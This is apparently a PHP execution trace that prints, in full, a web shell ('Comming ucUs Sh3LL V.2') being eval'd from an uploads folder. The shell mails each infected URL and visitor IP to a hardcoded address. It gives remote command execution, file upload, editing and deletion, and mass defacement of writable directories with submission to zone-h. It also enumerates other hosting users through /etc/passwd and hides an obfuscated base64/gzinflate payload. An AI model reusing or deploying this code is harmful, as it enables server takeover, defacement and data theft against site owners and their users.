3 12 0 0.002025 547608 eval 1 '?><?php\r\n@ini_set(\'output_buffering\', 0);\r\n@ini_set(\'display_errors\', 0);\r\nset_time_limit(0);\r\nini_set(\'memory_limit\', \'64M\');\r\nheader(\'Content-Type: text/html; charset=UTF-8\');\r\n$tujuanmail = \'mecus.mecus.mecus@gmail.com\';\r\n$x_path = "http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'];\r\n$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER[\'REMOTE_ADDR\'] . " ]";\r\nmail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER[\'REMOTE_ADDR\'] . " ]");\r\n?>\r\n<?php\r\nerror_reporting(0);\r\nset_time_limit(0);\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $key=>$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\necho \'<!DOCTYPE HTML>\r\n<html>\r\n<head>\r\n\r\n<link href="https://fonts.googleapis.com/css?family=Supermercado+One&display=swap" rel="stylesheet">\r\n<title>Comming ucUs Sh3LL V.2</title>\r\n<style>\r\nbody{\r\nfont-family:Supermercado One, sans-serif;\r\nbackground-color: #000022;\r\nbackground-image: url();\r\nbackground-size: center; background-repeat:no-repeat; background-attachment: fixed; background-size: cover; background-position:center;\r\ncolor: white;\r\n}\r\n#content tr:hover{\r\nbackground-color: black;\r\ntext-shadow:0px 0px 10px black;\r\n}\r\n#content .first{\r\nbackground-color: white;\r\n}\r\ntable{\r\nborder: 1px #000000 dotted;\r\n}\r\na{\r\ncolor: #00FF66;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor:blue;\r\ntext-shadow:0px 0px 10px #ffffff;\r\n}\r\ninput,select,textarea{\r\nborder: 1px #000000 solid;\r\n-moz-border-radius: 5px;\r\n-webkit-border-radius:5px;\r\nborder-radius:5px;\r\n}\r\n.lazy {\r\n margin: 0;\r\n font-family:Supermercado One;\r\n}\r\n</style>\r\n</head>\r\n</body>\r\n<body>\r\n<h1><center><img src="https://c.top4top.net/p_11004tbku0.gif" height="350 width="350"><font color="white" face=""><div class="lazy">Comming ucUs SH3LL V.2</font></center></h1>\r\n<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">\r\n<tr><td><font color="white">Path :</font> \';\r\nif(isset($_GET[\'path\'])){\r\n$path = $_GET[\'path\'];\r\n}else{\r\n$path = getcwd();\r\n}\r\n$path = str_replace(\'\\\\\',\'/\',$path);\r\n$paths = explode(\'/\',$path);\r\n\r\nforeach($paths as $id=>$pat){\r\nif($pat == \'\' && $id == 0){\r\n$a = true;\r\necho \'<a href="?path=/">/</a>\';\r\ncontinue;\r\n}\r\nif($pat == \'\') continue;\r\necho \'<a href="?path=\';\r\nfor($i=0;$i<=$id;$i++){\r\necho "$paths[$i]";\r\nif($i != $id) echo "/";\r\n}\r\necho \'">\'.$pat.\'</a>/\';\r\n}\r\necho \'</td></tr><tr><td>\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'<font color="green">Berhasil Njeng!!!</font><br />\';\r\n}else{\r\necho \'<font color="red">Gagal Njeng!!!</font><br/>\';\r\n}\r\n}\r\n\tif(isset($_GET[\'dir\'])) {\r\n\t$dir = $_GET[\'dir\'];\r\n\tchdir($dir);\r\n} else {\r\n\t$dir = getcwd();\r\n}\r\n$ip = gethostbyname($_SERVER[\'HTTP_HOST\']);\r\n$kernel = php_uname();\r\n$ds = @ini_get("disable_functions");\r\n$show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=#00FF66>Bersih Njeng!</font>";\r\nif(!function_exists(\'posix_getegid\')) {\r\n\t$user = @get_current_user();\r\n\t$uid = @getmyuid();\r\n\t$gid = @getmygid();\r\n\t$group = "?";\r\n} else {\r\n\t$uid = @posix_getpwuid(posix_geteuid());\r\n\t$gid = @posix_getgrgid(posix_getegid());\r\n\t$user = $uid[\'name\'];\r\n\t$uid = $uid[\'uid\'];\r\n\t$group = $gid[\'name\'];\r\n\t$gid = $gid[\'gid\'];\r\n}\r\necho "Disable Functions : $show_ds<br>";\r\necho "System : <font color=#00FF66>".$kernel."</font><br>";\r\necho "<center>";\r\necho "<hr>";\r\necho "[ <a href=\'?\'>Home</a> ]";\r\necho "[ <a href=\'?dir=$dir&to=zoneh\'>Zone-h</a> ]";\r\necho "[ <a href=\'?dir=$dir&to=jumping\'>Jumping</a> ]";\r\necho "[ <a href=\'?dir=$dir&to=sym\'>Symlink</a> ]";\r\necho "[ <a href=\'?dir=$dir&to=mass\'>Mass Depes</a> ]";\r\necho "[ <a href=\'?dir=$dir&to=cmd\'>Command</a> ]";\r\necho "</center>";\r\necho "<hr>";\r\nif($_GET[\'to\'] == \'zoneh\') {\r\n\tif($_POST[\'submit\']) {\r\n\t\t$domain = explode("\\r\\n", $_POST[\'url\']);\r\n\t\t$nick = $_POST[\'nick\'];\r\n\t\techo "Defacer Onhold: <a href=\'http://www.zone-h.org/archive/notifier=$nick/published=0\' target=\'_blank\'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";\r\n\t\techo "Defacer Archive: <a href=\'http://www.zone-h.org/archive/notifier=$nick\' target=\'_blank\'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";\r\n\t\tfunction zoneh($url,$nick) {\r\n\t\t\t$ch = curl_init("http://www.zone-h.com/notify/single");\r\n\t\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POST, true);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");\r\n\t\t\treturn curl_exec($ch);\r\n\t\t\t\t curl_close($ch);\r\n\t\t}\r\n\t\tforeach($domain as $url) {\r\n\t\t\t$zoneh = zoneh($url,$nick);\r\n\t\t\tif(preg_match("/color=\\"red\\">OK<\\/font><\\/li>/i", $zoneh)) {\r\n\t\t\t\techo "$url -> <font color=lime>OK</font><br>";\r\n\t\t\t} else {\r\n\t\t\t\techo "$url -> <font color=red>ERROR</font><br>";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center><form method=\'post\'>\r\n\t\t<u>Defacer</u>: <br>\r\n\t\t<input type=\'text\' name=\'nick\' size=\'50\' value=\'MecUs7\'><br>\r\n\t\t<u>Domains</u>: <br>\r\n\t\t<textarea style=\'width: 450px; height: 150px;\' name=\'url\'></textarea><br>\r\n\t\t<input type=\'submit\' name=\'submit\' value=\'Submit\' style=\'width: 450px;\'>\r\n\t\t</form>";\r\n\t}\r\n\techo "</center>";\r\n} elseif($_GET[\'to\'] == \'mass\') {\r\n\tfunction sabun_massal($dir,$namafile,$isi_script) {\r\n\t\tif(is_writable($dir)) {\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t\t$lokasi = $dirc.\'/\'.$namafile;\r\n\t\t\t\tif($dirb === \'.\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\t\techo "[<font color=lime>DONE</font>] $lokasi<br>";\r\n\t\t\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t\t\t\t$idx = sabun_massal($dirc,$namafile,$isi_script);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tfunction sabun_biasa($dir,$namafile,$isi_script) {\r\n\t\tif(is_writable($dir)) {\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t\t$lokasi = $dirc.\'/\'.$namafile;\r\n\t\t\t\tif($dirb === \'.\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\t\techo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";\r\n\t\t\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif($_POST[\'start\']) {\r\n\t\tif($_POST[\'tipe_sabun\'] == \'mahal\') {\r\n\t\t\techo "<div style=\'margin: 5px auto; padding: 5px\'>";\r\n\t\t\tsabun_massal($_POST[\'d_dir\'], $_POST[\'d_file\'], $_POST[\'script\']);\r\n\t\t\techo "</div>";\r\n\t\t} elseif($_POST[\'tipe_sabun\'] == \'murah\') {\r\n\t\t\techo "<div style=\'margin: 5px auto; padding: 5px\'>";\r\n\t\t\tsabun_biasa($_POST[\'d_dir\'], $_POST[\'d_file\'], $_POST[\'script\']);\r\n\t\t\techo "</div>";\r\n\t\t}\r\n\t} else {\r\n\techo "<center>";\r\n\techo "<form method=\'post\'>\r\n\t<font style=\'text-decoration: underline;\'>Tipe Mass:</font><br>\r\n\t<input type=\'radio\' name=\'tipe_sabun\' value=\'murah\' checked>Biasa<input type=\'radio\' name=\'tipe_sabun\' value=\'mahal\'>Massal<br>\r\n\t<font style=\'text-decoration: underline;\'>Folder:</font><br>\r\n\t<input type=\'text\' name=\'d_dir\' value=\'$dir\' style=\'width: 450px;\' height=\'10\'><br>\r\n\t<font style=\'text-decoration: underline;\'>Filename:</font><br>\r\n\t<input type=\'text\' name=\'d_file\' value=\'ucUs7.php\' style=\'width: 450px;\' height=\'10\'><br>\r\n\t<font style=\'text-decoration: underline;\'>Index File:</font><br>\r\n\t<textarea name=\'script\' style=\'width: 450px; height: 200px;\'>Hacked By MecUs7</textarea><br>\r\n\t<input type=\'submit\' name=\'start\' value=\'HAJAR COK!\' style=\'width: 450px;\'>\r\n\t</form></center>";\r\n\t} \r\n\t}elseif($_GET[\'to\'] == \'sym\') {\r\necho \'<hr>\';\r\neval(gzinflate(base64_decode(\'7Vf/T9tGFP89Uv6H1yOT7ZHaSRBrReKUrjCt0lakAtskqCLHPmOPi8+6u2BSyv++d+fYpE4AlVbaJhWJyHnf/b583ksnnjMGPkglJoLmLAip3ZkcH77/4/D9mXVw9Ob098N3J5P3R0cn1ocuENKFTh6oxBm2W52oNwvSTKL6fpwyahOPqtDLghmN3JBnMdFSW1uJUmhWtltpbFc6zk27tT+7jFJhk4iGwWIiFzPS7b148UIr7YdJg2Wo9JqGNmEZPJfggeBcGXpHe9/BMKyjXKUcI3qbRSgr4RfOGC+OF7Pf0uwSIzhIBQ0VFwsjAMa8m6hZu/U6ik4WOQVFr5WHeUgzcPMkB8P5NcgiRkWT2W4dByqV8QJeZwvLBJLrMGKe08y20HAQ4otLq2sVVhloYfiFSBXmGaW7ZezOcD8OGZclUYvSMOFA2q2RCqaMQsDSi8wPaaYwjCkXERX+DlZtwahvFWmkkr2fej8MS87zkDMu9rZe/tzDv6E11maE+Yw+szQexTxTYMR9ls4oyPQj9QfjYxfecXfkafZ45KnoS5QPuCnxE7VPJRVP1cVCMyx0Q9vDdyemX0M+Rz0f+vgt5oIGYVJ3JAQSls+6ObFXqaAXqU0+8oySbsVybnIkT2aBCpNJwJhtbWkBILb7o0O2rG5lRD+UidDljNlcJrZ+QsM4bAwbRIl0ZldCZ/0PZ70PjgNjGGj/nTnmAUPNuUyvJxdU5cU8jWwzaLzIqFhO2xUmJpBUesRtmqq7CIvfyB8mpszhMnEEXKjS46LCPelnNEZqAImgsY9jne95XlEUbtO3S7yqRiyQ0lfXarwuU3sJVjxpOf3qZ5bGEcuI1bzKtdXRsOXV6OBpKPASPqPemrqXz6csDSc45cwCFQjMpW9NpizILq21KJsdtAxt2UOwWshlvra3h7e3t3WqPTOvpt9uKZNUl/Lk8PjELyHSMkXL0V0RWWU7gG0EnoSI/3VAhMcQER6AROQ2UREqWIQHcLE/LtEO7sEN0/M7GzHuEZUN2PSYk3VEqvEIPgckMO9dJ4usdApuXSKIA1wAvU6VTU4z8/aKg5YFrfjMVB6KRLfZs5hyXLaa7ujGgo7e0jG2vlxSjUODYlSzAiGChV1SdUB3IIcte+4huL1yzvfOPU9qhJPdWrdpaPWQIOVEdvFqqCRw9o3GHQrWhhD5+gP49AnWGL4PPc24c+MDmaYZWSPqlP3V73uxXOddBcJj6dTL7mMGIi80aTP3gucJFes8uTEQYy+arTPmEk0hNN0TQ6zyzW+VbWJoDcTfzQxzhxEHk423mEqzOb0bID0gDzXuho3wYLevwLzWq0KpFMmq50cMVBj/AMQ3XKwi/BrA1wMY3DN9Gr9rlKkmownmJZTr+5VLeIYJ/jPNIl5I4tzci9mbEFtfsGt4fYfW6PkLAbvXe/kNoLrd+mqwfgCpq0Ing2WZrcsBYzs70aAuDxxTcUXFyEsG428C7m8P/lVgV3SWY6IIGXbwQOvjY888DTTW65schfAAtZfskQ+GW37d3nbgpoPXnv5h1bj/jMASQfFwQJJTOnN9+JunWLY9q2vILjnPsHGrSlijqfDG1rAKrTw+9ZdlA+4i0URllo+iUrk4jgjeRblY4nxeLY/d7lJRk1dGZxdNray0ap9tsvpV+2x9mX2bTfZ9jX1fY//nNdYYxw2bbORF6RV+LoMmw3mmza5MplG6Bb3v4E59EwK+CbKM4yvjz2hFoYmHtQdtrvx/Nf4H\')));\r\n} elseif($_GET[\'to\'] == \'jumping\') {\r\n\t$i = 0;\r\n\techo "<div class=\'margin: 5px auto;\'>";\r\n\tif(preg_match("/hsphere/", $dir)) {\r\n\t\t$urls = explode("\\r\\n", $_POST[\'url\']);\r\n\t\tif(isset($_POST[\'jump\'])) {\r\n\t\t\techo "<pre>";\r\n\t\t\tforeach($urls as $url) {\r\n\t\t\t\t$url = str_replace(array("http://","www."), "", strtolower($url));\r\n\t\t\t\t$etc = "/etc/passwd";\r\n\t\t\t\t$f = fopen($etc,"r");\r\n\t\t\t\twhile($gets = fgets($f)) {\r\n\t\t\t\t\t$pecah = explode(":", $gets);\r\n\t\t\t\t\t$user = $pecah[0];\r\n\t\t\t\t\t$dir_user = "/hsphere/local/home/$user";\r\n\t\t\t\t\tif(is_dir($dir_user) === true) {\r\n\t\t\t\t\t\t$url_user = $dir_user."/".$url;\r\n\t\t\t\t\t\tif(is_readable($url_user)) {\r\n\t\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t\t$jrw = "[<font color=lime>R</font>] <a href=\'?dir=$url_user\'><font color=gold>$url_user</font></a>";\r\n\t\t\t\t\t\t\tif(is_writable($url_user)) {\r\n\t\t\t\t\t\t\t\t$jrw = "[<font color=lime>RW</font>] <a href=\'?dir=$url_user\'><font color=gold>$url_user</font></a>";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo $jrw."<br>";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tif($i == 0) { \r\n\t\t} else {\r\n\t\t\techo "<br>Total ada ".$i." Kamar di ".$ip;\r\n\t\t}\r\n\t\techo "</pre>";\r\n\t\t} else {\r\n\t\t\techo \'<center>\r\n\t\t\t\t <form method="post">\r\n\t\t\t\t List Domains: <br>\r\n\t\t\t\t <textarea name="url" style="width: 500px; height: 250px;">\';\r\n\t\t\t$fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");\r\n\t\t\twhile($getss = fgets($fp)) {\r\n\t\t\t\techo $getss;\r\n\t\t\t}\r\n\t\t\techo \'</textarea><br>\r\n\t\t\t\t <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">\r\n\t\t\t\t </form></center>\';\r\n\t\t}\r\n\t} elseif(preg_match("/vhosts|vhost/", $dir)) {\r\n\t\tpreg_match("/\\/var\\/www\\/(.*?)\\//", $dir, $vh);\r\n\t\t$urls = explode("\\r\\n", $_POST[\'url\']);\r\n\t\tif(isset($_POST[\'jump\'])) {\r\n\t\t\techo "<pre>";\r\n\t\t\tforeach($urls as $url) {\r\n\t\t\t\t$url = str_replace("www.", "", $url);\r\n\t\t\t\t$web_vh = "/var/www/".$vh[1]."/$url/httpdocs";\r\n\t\t\t\tif(is_dir($web_vh) === true) {\r\n\t\t\t\t\tif(is_readable($web_vh)) {\r\n\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t$jrw = "[<font color=lime>R</font>] <a href=\'?dir=$web_vh\'><font color=gold>$web_vh</font></a>";\r\n\t\t\t\t\t\tif(is_writable($web_vh)) {\r\n\t\t\t\t\t\t\t$jrw = "[<font color=lime>RW</font>] <a href=\'?dir=$web_vh\'><font color=gold>$web_vh</font></a>";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\techo $jrw."<br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tif($i == 0) { \r\n\t\t} else {\r\n\t\t\techo "<br>Total ada ".$i." Kamar di ".$ip;\r\n\t\t}\r\n\t\techo "</pre>";\r\n\t\t} else {\r\n\t\t\techo \'<center>\r\n\t\t\t\t <form method="post">\r\n\t\t\t\t List Domains: <br>\r\n\t\t\t\t <textarea name="url" style="width: 500px; height: 250px;">\';\r\n\t\t\t\t bing("ip:$ip");\r\n\t\t\techo \'</textarea><br>\r\n\t\t\t\t <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">\r\n\t\t\t\t </form></center>\';\r\n\t\t}\r\n\t} else {\r\n\t\techo "<pre>";\r\n\t\t$etc = fopen("/etc/passwd", "r") or die("<font color=red>Can\'t read /etc/passwd</font>");\r\n\t\twhile($passwd = fgets($etc)) {\r\n\t\t\tif($passwd == \'\' || !$etc) {\r\n\t\t\t\techo "<font color=red>Can\'t read /etc/passwd</font>";\r\n\t\t\t} else {\r\n\t\t\t\tpreg_match_all(\'/(.*?):x:/\', $passwd, $user_jumping);\r\n\t\t\t\tforeach($user_jumping[1] as $user_idx_jump) {\r\n\t\t\t\t\t$user_jumping_dir = "/home/$user_idx_jump/public_html";\r\n\t\t\t\t\tif(is_readable($user_jumping_dir)) {\r\n\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t$jrw = "[<font color=lime>R</font>] <a href=\'?dir=$user_jumping_dir\'><font color=gold>$user_jumping_dir</font></a>";\r\n\t\t\t\t\t\tif(is_writable($user_jumping_dir)) {\r\n\t\t\t\t\t\t\t$jrw = "[<font color=lime>RW</font>] <a href=\'?dir=$user_jumping_dir\'><font color=gold>$user_jumping_dir</font></a>";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\techo $jrw;\r\n\t\t\t\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t\t\t\t$domain_jump = file_get_contents("/etc/named.conf");\t\r\n\t\t\t\t\t\t\tif($domain_jump == \'\') {\r\n\t\t\t\t\t\t\t\techo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\tpreg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);\r\n\t\t\t\t\t\t\t\tforeach($domains_jump[1] as $dj) {\r\n\t\t\t\t\t\t\t\t\t$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n\t\t\t\t\t\t\t\t\t$user_jumping_url = $user_jumping_url[\'name\'];\r\n\t\t\t\t\t\t\t\t\tif($user_jumping_url == $user_idx_jump) {\r\n\t\t\t\t\t\t\t\t\t\techo " => ( <u>$dj</u> )<br>";\r\n\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\techo "<br>";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($i == 0) { \r\n\t\t} else {\r\n\t\t\techo "<br>Total ada ".$i." Kamar di ".$ip;\r\n\t\t}\r\n\t\techo "</pre>";\r\n\t}\r\n\techo "</div>";\r\n} elseif($_GET[\'to\'] == \'cmd\') {\r\n\techo "<form method=\'post\'>\r\n\t<font style=\'text-decoration: underline;\'>".$user."@".$ip.": ~ $ </font>\r\n\t<input type=\'text\' size=\'30\' height=\'10\' name=\'cmd\'><input type=\'submit\' name=\'do_cmd\' value=\'>>\'>\r\n\t</form>";\r\n\tif($_POST[\'do_cmd\']) {\r\n\t\techo "<pre>".exe($_POST[\'cmd\'])."</pre>";\r\n\t}\r\n}\r\necho \'<form enctype="multipart/form-data" method="POST">\r\n<font color="white">File Upload :</font> <input type="file" name="file" />\r\n<input type="submit" value="Crotz" />\r\n</form>\r\n</td></tr>\';\r\nif(isset($_GET[\'filesrc\'])){\r\necho "<tr><td>Current File : ";\r\necho $_GET[\'filesrc\'];\r\necho \'</tr></td></table><br />\';\r\necho(\'<pre>\'.htmlspecialchars(file_get_contents($_GET[\'filesrc\'])).\'</pre>\');\r\n}elseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';\r\nif($_POST[\'opt\'] == \'chmod\'){\r\nif(isset($_POST[\'perm\'])){\r\nif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\r\necho \'<font color="green">Change Permission Berhasil</font><br/>\';\r\n}else{\r\necho \'<font color="red">Change Permission Gagal</font><br />\';\r\n}\r\n}\r\necho \'<form method="POST">\r\nPermission : <input name="perm" type="text" size="4" value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'path\'])), -4).\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="chmod">\r\n<input type="submit" value="Go" />\r\n</form>\';\r\n}elseif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'<font color="green">Ganti Nama Berhasil</font><br/>\';\r\n}else{\r\necho \'<font color="red">Ganti Nama Gagal</font><br />\';\r\n}\r\n$_POST[\'name\'] = $_POST[\'newname\'];\r\n}\r\necho \'<form method="POST">\r\nNama Baru : <input name="newname" type="text" size="20" value="\'.$_POST[\'name\'].\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="rename">\r\n<input type="submit" value="Crotz" />\r\n</form>\';\r\n}elseif($_POST[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'<font color="green">Berhasil Edit File</font><br/>\';\r\n}else{\r\necho \'<font color="red">Gagal Edit File</font><br/>\';\r\n}\r\nfclose($fp);\r\n}\r\necho \'<form method="POST">\r\n<textarea cols=80 rows=20 name="src">\'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea><br />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="edit">\r\n<input type="submit" value="Save" />\r\n</form>\';\r\n}\r\necho \'</center>\';\r\n}else{\r\necho \'</table><br/><center>\';\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif(rmdir($_POST[\'path\'])){\r\necho \'<font color="green">Directory Terhapus</font><br/>\';\r\n}else{\r\necho \'<font color="red">Directory Gagal Terhapus </font><br/>\';\r\n}\r\n}elseif($_POST[\'type\'] == \'file\'){\r\nif(unlink($_POST[\'path\'])){\r\necho \'<font color="green">File Terhapus</font><br/>\';\r\n}else{\r\necho \'<font color="red">File Gagal Dihapus</font><br/>\';\r\n}\r\n}\r\n}\r\necho \'</center>\';\r\n$scandir = scandir($path);\r\necho \'<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">\r\n<tr class="first">\r\n<td><center>Name</peller></center></td>\r\n<td><center>Size</peller></center></td>\r\n<td><center>Permission</peller></center></td>\r\n<td><center>Modify</peller></center></td>\r\n</tr>\';\r\n\r\nforeach($scandir as $dir){\r\nif(!is_dir($path.\'/\'.$dir) || $dir == \'.\' || $dir == \'..\') continue;\r\necho \'<tr>\r\n<td><a href="?path=\'.$path.\'/\'.$dir.\'">\'.$dir.\'</a></td>\r\n<td><center>--</center></td>\r\n<td><center>\';\r\nif(is_writable($path.\'/\'.$dir)) echo \'<font color="green">\';\r\nelseif(!is_readable($path.\'/\'.$dir)) echo \'<font color="red">\';\r\necho perms($path.\'/\'.$dir);\r\nif(is_writable($path.\'/\'.$dir) || !is_readable($path.\'/\'.$dir)) echo \'</font>\';\r\n\r\necho \'</center></td>\r\n<td><center><form method="POST" action="?option&path=\'.$path.\'">\r\n<select name="opt">\r\n<option value="">Select</option>\r\n<option value="delete">Delete</option>\r\n<option value="chmod">Chmod</option>\r\n<option value="rename">Rename</option>\r\n</select>\r\n<input type="hidden" name="type" value="dir">\r\n<input type="hidden" name="name" value="\'.$dir.\'">\r\n<input type="hidden" name="path" value="\'.$path.\'/\'.$dir.\'">\r\n<input type="submit" value=">">\r\n</form></center></td>\r\n</tr>\';\r\n}\r\necho \'<tr class="first"><td></td><td></td><td></td><td></td></tr>\';\r\nforeach($scandir as $file){\r\nif(!is_file($path.\'/\'.$file)) continue;\r\n$size = filesize($path.\'/\'.$file)/1024;\r\n$size = round($size,3);\r\nif($size >= 1024){\r\n$size = round($size/1024,2).\' MB\';\r\n}else{\r\n$size = $size.\' KB\';\r\n}\r\n\r\necho \'<tr>\r\n<td><a href="?filesrc=\'.$path.\'/\'.$file.\'&path=\'.$path.\'">\'.$file.\'</a></td>\r\n<td><center>\'.$size.\'</center></td>\r\n<td><center>\';\r\nif(is_writable($path.\'/\'.$file)) echo \'<font color="green">\';\r\nelseif(!is_readable($path.\'/\'.$file)) echo \'<font color="red">\';\r\necho perms($path.\'/\'.$file);\r\nif(is_writable($path.\'/\'.$file) || !is_readable($path.\'/\'.$file)) echo \'</font>\';\r\necho \'</center></td>\r\n<td><center><form method="POST" action="?option&path=\'.$path.\'">\r\n<select name="opt">\r\n<option value="">Pilih</option>\r\n<option value="delete">Hapus</option>\r\n<option value="chmod">Chmod</option>\r\n<option value="rename">Ganti Nama</option>\r\n<option value="edit">Ubah</option>\r\n</select>\r\n<input type="hidden" name="type" value="file">\r\n<input type="hidden" name="name" value="\'.$file.\'">\r\n<input type="hidden" name="path" value="\'.$path.\'/\'.$file.\'">\r\n<input type="submit" value=">">\r\n</form></center></td>\r\n</tr>\';\r\n}\r\necho \'</table>\r\n</div>\';\r\n}\r\necho \'<center><br/>Copyright © 2019 | Powered By MecUs7</center>\r\n</body>\r\n</html>\';\r\nfunction perms($file){\r\n$perms = fileperms($file);\r\n\r\nif (($perms & 0xC000) == 0xC000) {\r\n// Socket\r\n$info = \'s\';\r\n} elseif (($perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n$info = \'l\';\r\n} elseif (($perms & 0x8000) == 0x8000) {\r\n// Regular\r\n$info = \'-\';\r\n} elseif (($perms & 0x6000) == 0x6000) {\r\n// Block special\r\n$info = \'b\';\r\n} elseif (($perms & 0x4000) == 0x4000) {\r\n// Directory\r\n$info = \'d\';\r\n} elseif (($perms & 0x2000) == 0x2000) {\r\n// Character special\r\n$info = \'c\';\r\n} elseif (($perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n$info = \'p\';\r\n} else {\r\n// Unknown\r\n$info = \'u\';\r\n}\r\n\r\n// Owner\r\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0040) ?\r\n(($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n// Group\r\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0008) ?\r\n(($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n// World\r\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0001) ?\r\n(($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n(($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\nreturn $info;\r\n}\r\n?> ' /var/www/html/uploads/x.php(8) : eval()'d code 1 0
4 13 0 0.002483 547608 ini_set 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 2 2 'output_buffering' 0
4 13 1 0.002502 547680
4 13 R FALSE
4 14 0 0.002517 547608 ini_set 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 3 2 'display_errors' 0
4 14 1 0.002533 547680
4 14 R ''
4 15 0 0.002546 547608 set_time_limit 0 /var/www/html/uploads/x.php(8) : eval()'d code(1) : eval()'d code 4 1 0
4 15 1 0.002562 547672
4 15 R FALSE
